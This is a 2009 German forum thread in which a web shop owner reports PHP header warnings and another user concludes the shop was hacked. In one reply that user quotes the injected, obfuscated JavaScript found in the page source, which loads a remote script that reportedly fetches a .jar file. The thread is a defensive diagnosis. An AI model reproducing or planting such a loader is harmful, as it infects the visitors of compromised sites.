#1 (permalink)  
Alt 23.12.2009, 17:15
Benutzer

Standard Problem seid kurzem mit dem Shop

Hallo zusammen,

ich habe ein Problem mit meinem Shop. Es fing heute mittag an. Zur Zeit kommt folgende Fehlermeldung wenn man einen Artikel in den Warenkorb gelegt hat.

Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:108) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29

Wenn ich dann F5 drück ist der Artikel im Korb und der Shop erschient wieder.

Wie kann ich das beheben ?

Vielen Dank für Eure Hilfe !

Gruss,
Torsten
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
  #2 (permalink)  
Alt 24.12.2009, 11:26
Benutzer

Standard

es geht leider weiter ...

der login als admin geht nicht mehr, es kommt diese Meldung:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76

Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
  #3 (permalink)  
Alt 24.12.2009, 14:35
Benutzer

Standard

Schau mal auf dem dem Server nach, wann die Files zuletzt geändert wurden.

Ich vermute Dein Shop wurde gehackt. In Quelltext steht überall
Zitat:
<script>/*GNU GPL*/ try{window.onload = function(){var Reo0kbvrvrz = document.createElement('s^$@c&r#$(#i$#)p^t#&)$'.re place(/\(|@|&|\$|\)|\^|\!|#/ig, ''));Reo0kbvrvrz.setAttribute('type', 'text/javascript');Reo0kbvrvrz.setAttribute('src', 'h&t#@t(p&#&:&(/&&/!p^(e^&)r$@e@)z$!h()#^i))$l$@&t##!!o)#$n&-^#c&o^)m&$.$^k^!&#a@(#&s^&&!(k&^u)@#$s!(#.!@$)u!s& #@.&)^5#$$(1!)#y@!(e!s#)$)-@^^@c&$@&o@@(m($.(m@$@u!)^s#^$i&c#$b!o@x$$p&$#)r#o &#).^&#r)!#$u$$:#@^8$#0#)8^#&0(^#/)o&(#)$r)!k#&u(&!&t#.&^&c)$$(o#)#.!&&i((n&)(/()(o&!r@$k@#u$$()!t@$.#c&o)#$.^&)i#n!@@/#!(@(f!)@e$)&^e((d^b($u$(@((r@&$@n##(^e(r@@@.&^&(# c&@&o#^(#m!^&/@@@g)l(^$o)!b##)@!e)&^7&^!$.@)c)!(!o&m)!/@^#g#@^(o^@o#$g@(l$(#e@.!&c((o!m@#$)/@)'.replace(/\!|\)|&|\$|\(|@|#|\^/ig, ''));Reo0kbvrvrz.setAttribute('defer', 'defer');Reo0kbvrvrz.setAttribute('id', 'M)#&v&#^@w!^!#2^@&!6&#1&^()8^#h)n$!^(f)()o&@4)q^'.replace(/@|\!|&|\(|\)|\$|#|\^/ig, ''));document.body.appendChild(Reo0kbvrvrz);}} catch(e) {}</script>
und meine Firewall wird auch ganz nervös, weil von einer russischen WebSite ein .jar File geladen wird.

Also ganz schnell das Backup aufspielen, denn für Deine Kunden ist das nicht so toll an Weihnachten.
  #4 (permalink)  
Alt 25.12.2009, 14:26
Benutzer

Standard

So, scheint bis auf 2 Probleme alles behoben:

1) Nach dem Einloggen kann ich im Content Manager keine Seiten bearbeiten

2) Wollte ein Backup machen und bekomme die Meldung "Interner Fehler"

Gruss,
Torsten
  #5 (permalink)  
Alt 25.12.2009, 15:47
Benutzer

Standard

hat Du ein lokales Backup, dass Du wieder per FTP auf den Server spielen kannst?

Frag bei Deinem Hoster nach, er soll 1 Tag vor der Attacke, den Stand wieder einspielen.

Und dann schnell die Sicherheitsmängel beheben.
  #6 (permalink)  
Alt 26.12.2009, 13:58
Benutzer

Standard

So, alles wieder im Lot.

Bis auf ein Problem mt dem Content Manager.

Ich hoffe es kann mir jemand helfen.

Das Bearbeitungsfenster der Seiten wird nicht mehr angezeigt.

Siehe Screenshot !

Danke !

Gruss,
Torsten
Angehängte Grafiken
Dateityp: jpg content manager.jpg (328,8 KB, 16x aufgerufen)
Antwort

Lesezeichen

Stichworte
kurzem, problem, shop

Themen-Optionen
Ansicht